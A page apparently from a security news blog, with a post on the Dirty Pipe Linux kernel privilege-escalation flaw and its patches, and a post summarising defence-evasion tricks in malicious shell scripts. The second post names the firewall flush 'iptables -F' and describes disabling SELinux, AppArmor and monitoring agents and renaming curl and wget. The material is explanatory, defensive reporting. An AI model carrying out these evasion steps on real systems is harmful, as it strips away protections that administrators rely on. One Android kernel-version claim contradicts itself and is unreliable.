Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Linux Shell Scripts. Show all posts

 'Dirty Pipe' Kernel Bug Enables Root Patched via Linux Distros

 

Dirty Pipe is a Linux local privilege escalation problem that has been found and publicly released, together with proof-of-concept vulnerability. The 'Dirty Pipe' vulnerability was responsibly disclosed by security researcher Max Kellermann, who indicated it impacts Linux Kernel 5.8 and later versions, as well as Android devices. 

CVE-2022-0847 is a weakness in the Linux kernel which was introduced in version 5.8 and resolved in versions 5.16.11, 5.15.25, and 5.10.102.

Kellerman discovered the flaw while investigating a bug that was causing one of his customer's web server access records to be corrupted. The vulnerability, according to Kellerman, is similar to the Dirty COW vulnerability (CVE-2016-5195), which was addressed in 2016.

A bug in the kernel's pipe handling code allows a user program to rewrite the information of the page cache, which ultimately makes its way into the file system, thanks to a refactoring error. It is identical to Dirty COW, but it is relatively easier to use. 

While using Linux, check for and install security updates from the distro. Wait for Google (and maybe your maker and/or carrier) to send you an update if you're using Android; because it runs a kernel older than 5.8, the current version of Android for the Google Pixel 6 and the Samsung Galaxy S22 is currently in jeopardy. 

Kellerman revealed a proof-of-concept (PoC) vulnerability as part of the Dirty Pipe disclosure which essentially allows users to inject their own content into sensitive read-only files, removing limitations or modifying settings to provide wider access than they would normally have. 

However, security researcher BLASTY disclosed an improved vulnerability today which makes gaining root privileges easier by altering the /usr/bin/su command to dump a root shell at /tmp/sh and then invoking the script. 

Starting on February 20th, 2022, the vulnerability was responsibly revealed to several Linux maintainers, including the Linux kernel security team and the Android Security Team. Despite the fact that the defect has been resolved in Linux kernels 5.16.11, 5.15.25, and 5.10.102, numerous servers continue to use outdated kernels, making the release of this vulnerability a major concern for server admins. 

Furthermore, due to the ease with which these vulnerabilities may be used to acquire root access, it will only be a matter of time before threat actors start exploiting the vulnerability in upcoming attacks. The malware had previously used the comparable Dirty COW vulnerability, which was more difficult to attack.  

This flaw is particularly concerning for web hosting companies that provide Linux shell access, as well as colleges that frequently provide shell access to multi-user Linux systems. It has been a difficult year for Linux, with a slew of high-profile privilege-escalation flaws exposed.

Malicious Linux Shell Scripts Used to Evade Defenses

 

Attackers' evasive methods stretch back to the times when base64 and other popular encoding schemes were utilized. 

New Linux shell script methods and techniques are being used by attackers today to deactivate firewalls, monitor agents, and change access control lists (ACLs). The common evasive shell-script techniques are: 

1.Uninstalling monitoring agents 
Monitoring agents are software elements that track the system's process and network activity on a regular basis. The monitoring agents also produce various logs, which are useful during an incident probe. 

The malicious script, discovered in the osquery-based sandbox, attempts to uninstall the cloud-related monitoring agent Aegis (Alibaba Cloud threat detection agent) and terminate the Aliyun service. It also tries to uninstall YunJing, a host security agent from Tencent and BCM client management agent, which is generally installed on Endpoints for risk mitigation. 

2.Disabling Firewalls and Interrupts 
As a defensive measure, most systems and servers employ firewalls. As a defence evasive technique, the malicious software attempts to deactivate the firewall, i.e., uninterrupted firewall (ufw). In addition, attackers delete iptables rules (iptables -F), which are commonly used on Linux computers and servers for controlling firewall rules. 

The instructions were also exploited by attackers to deactivate non-maskable Interrupts (nmi). Watchdog is a configurable timer system that creates an interruption when a certain condition and time are met. The nmi watchdog interrupt handler would stop the process that caused the system to freeze in the case of a system freeze. To get over this defense, attackers disable the watchdog feature using the sysctl command or temporarily disabling it by setting the value to ‘0’. 

3.Disabling Linux Security Modules (LSMs) 
Security components such as SElinux and Apparmor are also disabled by the malicious shell script. These modules are used to establish MAC policies (mandatory access control). These modules might be easily configured by a server administrator to give users restricted access to the system's installed or running programs. 

-AppArmour: AppArmour is a Linux security feature that allows users to lock down apps such as Firefox for added protection. In Ubuntu's default setup, a user can restrict a program by granting it limited permissions. 

- SElinux: SElinux is a Linux security feature that allows a security administrator to deploy security context to certain apps and services. The shell is blocked or limited on various web servers, therefore RCE (Remote Code Execution) attackers generally bypass/disable it. 

4.Modifying ACLs 
The guidelines for granting rights on files and utilities are contained in ACLs, or Access Control Lists. ACLs on filesystems notify operating systems which users are authorized to access the system and what rights they possess. In Linux, the setfacl program is used to change and remove ACLs. 

5.Changing Attributes 
In Linux, the chattr is used to set and unset various characteristics of a file. Attackers use this to protect their own dropped files or to make their files permanent so that they can't be deleted by a user.

6.Renaming common utilities 
Common utilities like wget and curl were utilized with various names in one of the malicious scripts. These programs are often used to acquire files from a distant IP address. These tools are used by attackers to download malicious files from C2. 

If wget and curl are used under different names, some security systems that track the precise names of the utilities may not trigger the download event. 

-EDR Detections by Uptycs 
These malicious scripts were discovered with a threat level of 10/10 by Uptycs EDR using YARA process scanning. 

As attackers employ more complex and new techniques of evasion, it's more vital than ever to keep track of and document what's going on in the system. As per the Threat Post, the following suggestions are recommended: 

-Monitor suspicious processes, events, and network traffic that result from the execution of any untrusted binary on a regular basis.
-Keep your systems and firmware up to date with the most recent fixes and releases.